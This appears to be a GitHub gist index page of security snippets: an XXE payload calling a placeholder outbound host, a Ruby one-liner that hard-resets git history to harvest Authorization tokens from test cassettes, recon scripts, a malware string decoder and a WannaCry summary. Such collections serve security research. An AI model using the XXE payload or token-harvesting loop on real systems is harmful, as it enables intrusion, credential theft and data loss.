@viyatb
viyatb / XXE_payloads
Created September 7, 2017 00:19 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
viyatb / android-decompile.sh
Created September 5, 2017 23:45 — forked from nstarke/android-decompile.sh
Android APK Decompile Script
#!/bin/bash
APK=$1
# Linux only right now.
if [ ! -d "$HOME/.android-decompile-tools" ]; then
    mkdir "$HOME/.android-decompile-tools"
fi
viyatb / supervisord-example.conf
Created August 30, 2017 17:37 — forked from Sapphire64/supervisord-example.conf
Running virtualenv tornado in supervisord, running virtualenv celery in supervisord
[unix_http_server]
file=/tmp/supervisor.sock ; path to your socket file
[supervisord]
logfile=/var/log/supervisord/supervisord.log ; supervisord log file
logfile_maxbytes=50MB ; maximum size of logfile before rotation
logfile_backups=10 ; number of backed up logfiles
loglevel=error ; info, debug, warn, trace
pidfile=/var/run/supervisord.pid ; pidfile location
nodaemon=false ; run supervisord as a daemon
viyatb / extract-authorization-header-for-vcr.rb
Created August 24, 2017 22:24 — forked from jobertabma/extract-authorization-header-for-vcr.rb
One-liner to reset last 1000 git commits and extract the Authorization header to look for tokens from VCR cassettes
# VCR cassettes stored in JSON (requires the json stdlib for JSON.parse)
require 'json'
v = []; 1000.times { `git reset --hard HEAD~1`; v << Dir.glob('spec/support/cassettes/**/*.json').map { |f| c = JSON.parse(IO.read(f)); c['http_interactions'].map { |i| i['request']['headers']['Authorization'] } }.flatten.uniq }; puts v.flatten.uniq
# VCR cassettes stored in YAML (requires the yaml stdlib for YAML.load_file)
require 'yaml'
v = []; 1000.times { `git reset --hard HEAD~1`; v << Dir.glob('spec/support/cassettes/**/*.yml').map { |f| c = YAML.load_file(f); c['http_interactions'].map { |i| i['request']['headers']['Authorization'] } }.flatten.uniq }; puts v.flatten.uniq
import requests
import sys
import json
def waybackurls(host, with_subs):
    if with_subs:
        url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
    else:
        url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
import requests
import re
import sys
from multiprocessing.dummy import Pool
def robots(host):
    r = requests.get(
        'https://web.archive.org/cdx/search/cdx\
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS17-010. It uses the EternalBlue exploit for MS17-010 to propagate.
  • Ransom: between $300 and $600. The virus contains code to 'rm' (delete) files. It seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is reachable, the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm.

SECURITY BULLETIN AND UPDATES HERE: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

viyatb / vawtrak_string_decoder.py
Created April 18, 2017 02:35 — forked from herrcore/vawtrak_string_decoder.py
IDA python string decoder for Vawtrak 930eccf4bedcd5e0901306410787adc6a95acd957a7383d326d9949c76fcc828
import idaapi, idc, idautils
import re
import struct
import base64
flag_arr=[]
def decrypt_algo(key, data, data_len):
    out=""
    for i in range(0, data_len):
viyatb / test.c
Created March 15, 2017 23:57
Test
Hi

Option 1: Command-line download extension as zip and extract

extension_id=jifpbeccnghkjeaalbbjmodiffmgedin   # change this ID
curl -L -o "$extension_id.zip" "https://clients2.google.com/service/update2/crx?response=redirect&os=mac&arch=x86-64&nacl_arch=x86-64&prod=chromecrx&prodchannel=stable&prodversion=44.0.2403.130&x=id%3D$extension_id%26uc"
unzip -d "$extension_id-source" "$extension_id.zip"

Thanks to crxviewer for the magic download URL.